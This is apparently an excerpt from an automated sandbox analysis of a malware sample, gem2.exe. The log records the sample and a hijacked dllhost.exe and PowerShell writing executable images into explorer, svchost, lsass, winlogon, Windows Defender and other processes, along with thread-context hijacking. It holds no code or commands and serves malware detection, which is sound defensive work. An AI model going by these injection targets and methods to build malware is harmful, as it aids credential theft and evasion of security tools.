Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 26D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 28C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 25C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 24B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 14B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 27E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 12F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 26E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 2300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 1090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\BuPFtkXYGdZXMZGRPPcSosTkCntitwBdtvFUnmmU\aYQVUnoqctB.exe base: 10A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8337D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2112DE50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F5A9650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9A25C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 173D0380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 237164F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1C59D2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2AC381E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2AC38210000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\Desktop\gem2.exeMemory written: PID: 7788 base: 400000 value: 4DJump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: PID: 7788 base: 401000 value: 55Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: PID: 7788 base: 402000 value: B8Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: PID: 7788 base: 404000 value: 00Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: PID: 7788 base: 42A000 value: 00Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: PID: 7788 base: 302D008 value: 00Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4056 base: 2D10000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\gem2.exeThread register set: target process: 7628Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1252Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD230000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD231000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD257000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD262000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD264000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD266000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD93A000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD93B000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE49000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE4A000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD94D9A8Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD94D9B0Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CD94D9B8Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE245F8Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE41DC0Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE429ABJump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE44C48Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE44C60Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE44C68Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE44CF0Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE44D08Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE44D10Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE44D18Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE44D20Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 173CDE44D28Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\System32\svchost.exe base: 734F545010Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 400000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 401000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 402000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 404000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 42A000Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 302D008Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 19183EC010Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287A7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 2D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
